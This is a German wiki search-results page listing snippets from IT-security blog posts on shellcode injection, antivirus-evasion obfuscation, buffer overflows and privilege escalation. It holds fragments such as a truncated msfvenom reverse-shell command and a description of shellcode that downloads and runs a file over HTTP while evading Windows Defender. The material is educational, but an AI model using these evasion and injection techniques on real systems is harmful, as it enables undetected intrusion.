NoSociety.de

#nosoc

  • Seiten-Werkzeuge
    Seite anzeigenÄltere VersionenLinks hierher
  • Webseiten-Werkzeuge
    Letzte ÄnderungenMedien-ManagerÜbersicht
  • Benutzer-Werkzeuge
    Anmelden

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Beginnt mit
  • Genaue Treffer
  • Beginnt mit
  • Endet mit
  • Enthält
@it-security
  • Alle Namensräume
  • it-security:blog (11)
Jederzeit
  • Jederzeit
  • Letzte Woche
  • Letzter Monat
  • letztes Jahr
Sortiere nach Treffer
  • Sortiere nach Treffer
  • Sortiere nach letzter Änderung

Volltextergebnisse:

Shellcode Injection Teil 1 @it-security:blog
6 Treffer, Zuletzt geändert: vor 10 Monaten
icht mehr als Bedrohung erkennt. Alle benötigten Dateien findet ihr im [[it-security:blog:shellcode_inje... im C-Format sein | | > shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_... n3 jigsaw.py shell.raw </code> und erhalten eine Datei mit C++ Code. <code c++> unsigned char jigsaw[54... n dieser Stelle jedoch nicht, da der Defender die Datei immer noch erkennt. {{:it-security:inject-shellc
Shellcode Injection Teil 3 @it-security:blog
4 Treffer, Zuletzt geändert: vor 12 Monaten
r eine Shellcode Injection nutzen können, um eine Datei mittels HTTP zu laden und anschließend auszuführe... sen === Der Code führt eine heruntergeladene VBS Datei aus. Wir wollen jedoch ein Python Script starten,... e stylus> ;Zeile 143 / +7 markiert den Anfang des Dateinamens (WindowsAgent.py) lea edx, [esi + 7] ;Zei... 4500 > payload.py </code> Der Shellcode lädt die Datei ''%%nat.zip%%'' von einem HTTP Server herunter, s
Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
3 Treffer, Zuletzt geändert: vor 11 Monaten
2 Offsets, für das Exploit. Also laden wir unsere Datei in den Debugger und starten: <code bash> gdb-ped... n wir unser Python Exploit aus, und erstellen die Datei in.txt. <code bash>python2 buffer.py</code> \\ \\ ==== Berechtigungen setzen ==== Unsere Datei benötigt noch die entsprechenden root Berechtigun
Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
3 Treffer, Zuletzt geändert: vor 10 Monaten
das Opfer-System. Nach dem Kopiervorgang wird die Datei nicht erkannt. Wir scannen diese einmal händisch ... gut aus. ==== Ausführen ==== Wir führen nun die Datei aus und warten auf das Ergebnis. Leider passiert... UUID Verschleierung funktioniert und schützt die Datei beim Festplatten-Zugriff. Nach der Ausführung mus
Shellcode Injection Teil 2 @it-security:blog
3 Treffer, Zuletzt geändert: vor 10 Monaten
jedoch nicht ausgereicht, so dass die kompilierte Datei direkt erkannt wurde. Dennoch habe ich Jigsaw auc... ie durch den ''%%function_encoder.py%%'' erzeugte Datei ''%%output.bin%%''. \\ \\ ==== Obfy ==== Jigsaw ... n Erfolg. Windows Defender konnte die kompilierte Datei nicht mehr erkennen. Hierzu musste ich nicht einm
Shellcode Injection Teil 4 @it-security:blog
3 Treffer, Zuletzt geändert: vor 10 Monaten
de> <callout type="info" icon="true"> Öffnet die Datei ''windir\syswow64\kernel32.dll'' in PEView. So kö... de> Dann lohnt sich ein Blick in die kompilierte Datei: <code> objdump -d calc-unsanitized.o </code> {... -final.o -s c </code> Der Befehl liefert uns die Datei in C-Format Syntax. Wir wissen, unser Shellcode b
Die Bedeutung von Awareness in der IT-Sicherheit @it-security:blog
2 Treffer, Zuletzt geändert: vor 15 Monaten
werden. Auslöser war der Doppelklick auf eine ISO Datei, welche als Anhang in einer E-Mail geschickt wurd... === In diesem speziellen Beispiel wurde eine ISO Datei eingebunden. Dies ist erstmal nur symbolisch zu v
Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
1 Treffer, Zuletzt geändert: vor 11 Monaten
unächst setzen wir root Rechte auf die vulnerable Datei und starten diese((https://blog.techorganic.com/2
Obfuscation: ByteSwapping @it-security:blog
1 Treffer, Zuletzt geändert: vor 7 Monaten
ahieren wir diesen und speichern ihn in eine neue Datei <code python> python shencode.py formatout -i po
Obfuscation: polymorpher In-Memory Decoder @it-security:blog
1 Treffer, Zuletzt geändert: vor 9 Monaten
ir extrahieren den eigentlichen Shellcode aus der Datei ''%%calc.o%%'' und speichern diesen in ''%%calc.r
Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
1 Treffer, Zuletzt geändert: vor 15 Monaten
wnloads/]] Nach dem Download müsst Ihr die Image-Datei auf einen bootbaren USB Stick oder eine DVD porti